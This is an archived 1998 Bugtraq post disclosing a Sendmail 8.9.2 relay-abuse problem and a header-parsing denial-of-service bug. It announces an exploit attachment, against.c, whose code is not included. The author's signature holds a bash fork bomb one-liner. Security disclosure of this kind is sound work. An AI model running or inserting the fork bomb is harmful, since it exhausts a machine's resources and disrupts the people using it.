The OpenNET Project
Date: Sat, 12 Dec 1998 19:39:56 +0100
From: Michal Zalewski <lcamtuf@IDS.PL>
To: BUGTRAQ@NETSPACE.ORG
Subject: ** Sendmail 8.9.2 DoS - exploit ** get what you want!

Hello again. Yesterday, I published some rather laconic information about
two bugs in Sendmail up to 8.9.2, and decided to post only a short
description of the problem + suggested patch (instead of an exploit), to give
developers a chance. Unfortunately, I put together information about two
completely different problems in a single posting, and it confused a lot of
people. So, to kill any senseless discussions - again:

- The first one was the 'redirection attack'; I said you could call it a 'bug'
  instead of a 'feature', but as no one likes anonymous mailbombing,
  network overloading / scanning, it's good to apply the sendmail.cf patch
  included in the original posting; without it, your relay could be abused in
  many painful ways. And yes, the attack has been confirmed with 8.9.2 and
  sendmail.cf from 8.9.2 with relaying enabled. I don't think there's
  anything left to talk about. Dot.

- The second one was a DoS attack during header parsing - and this is
  a bug, *confirmed on 8.9.2*. I included a simple patch to the source tree.
  Unfortunately, all the feedback we received from developers was the one-line
  response 'It has been fixed in 8.9.2'. Bullshit (sorry). I decided
  not to publish an exploit, but now I realize there's no chance for a
  response from vendors if there's no real danger. So here it is.
  The attached file, against.c, should perform a very 'light' attack, only
  for testing purposes. If you notice increased LA during the attack,
  your machine is vulnerable. You had enough time to patch your system
  - don't blame me, but the vendors. EOF.

_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [ENSI / marchew] [dione.ids.pl SYSADM]
[http://linux.lepszy.od.kobiety.pl/~lcamtuf/] <=--=> bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [pager (MetroBip): 0 642 222 813]
To iterate is human, to recurse divine [P. Deutsch]

[Attachment: against.c]
